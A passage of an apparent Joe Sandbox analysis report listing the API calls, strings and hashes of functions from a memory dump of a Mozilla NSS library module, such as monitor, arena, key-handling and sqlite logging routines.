                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CEF2D02
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CEF2D1F
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CEF2D42
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CEF2D5B
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1593528140-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7c125f402c6a016ce4bc3c613eb881b06cb59bb58a28187c77fefe1df64df511
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED01C4B1A002445BE7309E65FC40BC7B7B5EF55718F104525E86987B20E737F91687A3
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEF5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CEF5B56
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEF2D9C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CEF2DB2
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CEF2DCF
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CEF2DF2
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CEF2E0B
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1593528140-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 53a9e33fdbe261f14ae7a3beb4145d9cdaf792ae403ee73b0fef26ebfad4275d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E801C4B1A002445BEB309E25FC01FC7B7B1EF61318F204435E86987B10D736F92696A3
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE8AE42), ref: 6CE730AA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE730C7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CE730E5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE73116
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE7312B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: PK11_DestroyObject.NSS3(?,?), ref: 6CE73154
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE7317E
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6CE699FF,?,?,?,?,?,?,?,?,?,6CE62D6B,?), ref: 6CE8AE67
                                                                                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6CE699FF,?,?,?,?,?,?,?,?,?,6CE62D6B,?), ref: 6CE8AE7E
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CE62D6B,?,?,00000000), ref: 6CE8AE89
                                                                                                                                                                                                                                                                                                                      • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CE62D6B,?,?,00000000), ref: 6CE8AE96
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6CE62D6B,?,?), ref: 6CE8AEA3
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 754562246-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: a160215319d31595668802566a01c8cb1d910a502a00b7ab4497d57fa1a5ea7f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9555be9b636f6366934e9609b669cf2a2b52fbe3f4f6e5f53772c0737c1aacff
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a160215319d31595668802566a01c8cb1d910a502a00b7ab4497d57fa1a5ea7f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1601F476B8201057E711952CAC85BBB31788B9765CF280835E90ED7B81FA25D98682B3
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6CF77AFE,?,?,?,?,?,?,?,?,6CF7798A), ref: 6CF7BDC3
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6CF77AFE,?,?,?,?,?,?,?,?,6CF7798A), ref: 6CF7BDCA
                                                                                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CF77AFE,?,?,?,?,?,?,?,?,6CF7798A), ref: 6CF7BDE9
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,00000000,00000000,?,6CF77AFE,?,?,?,?,?,?,?,?,6CF7798A), ref: 6CF7BE21
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,00000000,?,6CF77AFE,?,?,?,?,?,?,?,?,6CF7798A), ref: 6CF7BE32
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3662805584-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 38ab7b54a7071a9e5305860fdd8a30c8dca78c61c3c04e62e4b9c34960d31a19
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0c5690e7ed07b456c20421656b2bd9cb222560dbf734828255ea23c3be412614
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38ab7b54a7071a9e5305860fdd8a30c8dca78c61c3c04e62e4b9c34960d31a19
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 791125B2FA12008FDF90EF28D849B473BB8FB0B244B04142BD50AC7300E772A614CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_Free.NSS3(?), ref: 6CF77C73
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF77C83
                                                                                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000001), ref: 6CF77C8D
                                                                                                                                                                                                                                                                                                                      • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CF77C9F
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CF77CAD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29BF0: TlsGetValue.KERNEL32(?,?,?,6CF70A75), ref: 6CF29C07
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 105370314-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: d684e7781c7c6758d660249afd7464d5ec8693118a2a3b4b590f3d07f37a310d
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d551b725e4c83398a192d7d241eb21b38b77aec3e5d048d9f94c878e1950de02
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d684e7781c7c6758d660249afd7464d5ec8693118a2a3b4b590f3d07f37a310d
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20F0C2B19202066FEB109F7AAC09D97776CEF04265B018437E819C7B00EB34E114CAE5
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(6CF7A6D8), ref: 6CF7AE0D
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CF7AE14
                                                                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(6CF7A6D8), ref: 6CF7AE36
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CF7AE3D
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,00000000,?,?,6CF7A6D8), ref: 6CF7AE47
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 682657753-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 54b4d2721fab38bd441320cf1c54e3133cee66718f0ba21832d012462271e0d3
                                                                                                                                                                                                                                                                                                                      • Instruction ID: a3dc3877e48de59b4e4a18224a8c2d332c42797ad3cb3dacc0e3846b4fea16a1
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54b4d2721fab38bd441320cf1c54e3133cee66718f0ba21832d012462271e0d3
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65F0F6B5601A01A7CA109F69E848A5777BCBF867747104329F12A83940D731E011C7E9
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,01DC7D83), ref: 6CDF8990
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                                                                                                      • String ID: @zl
                                                                                                                                                                                                                                                                                                                      • API String ID: 2221118986-1485391460
                                                                                                                                                                                                                                                                                                                      • Opcode ID: b3810c77a1014e6fa73ddb90b8a79da39213d2ac922920ab4ba4805fc6f88de9
                                                                                                                                                                                                                                                                                                                      • Instruction ID: e2dc9b4750129525234d7fc59d38ca336acc959abc70b7ab0892a9ed359c4737
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3810c77a1014e6fa73ddb90b8a79da39213d2ac922920ab4ba4805fc6f88de9
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7851F671A05782DFC704CF65C4946A6BBF0BF59308B24929EC8984BB12D331F596CBE2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE07D35
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                      • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 51f140e1e06ca08c4ce629d56e8fed502fc21e82da70e8a3a8d2cb988943e67b
                                                                                                                                                                                                                                                                                                                      • Instruction ID: e060ecf539fc5843569c7f9d2ebfcdf871126b0208872232384a1cbb7f70ad5a
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51f140e1e06ca08c4ce629d56e8fed502fc21e82da70e8a3a8d2cb988943e67b
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1731D471F0422997C710CF9EC880DBAB7F1AF4A309B694196E444B7B85D272EC62C7E4
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CDF6D36
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6CDF6D2F
                                                                                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CDF6D20
                                                                                                                                                                                                                                                                                                                      • database corruption, xrefs: 6CDF6D2A
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                      • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8eda5d2d24b8bbc5ad74acd752f0a8243b9fbd8661c0d1c3ebeffcb5ed467d37
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5d02e46a0f123975e6ce31b3afe7d6fd9b919fd647da3866bb386005e1d8e2d9
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8eda5d2d24b8bbc5ad74acd752f0a8243b9fbd8661c0d1c3ebeffcb5ed467d37
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F921E2716043059BC7108F1AD841B5AB7F2BF84308F15892DD8A99BF61E371E94787A1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+l,6CED32C2,<+l,00000000,00000000,?), ref: 6CED2FDA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: TlsGetValue.KERNEL32 ref: 6CEC14E0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: EnterCriticalSection.KERNEL32 ref: 6CEC14F5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: PR_Unlock.NSS3 ref: 6CEC150D
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6CED300B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6CED302A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEC08B4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAC3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6CEAC45D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAC3D0: TlsGetValue.KERNEL32 ref: 6CEAC494
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAC3D0: EnterCriticalSection.KERNEL32(?), ref: 6CEAC4A9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAC3D0: PR_Unlock.NSS3(?), ref: 6CEAC4F4
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
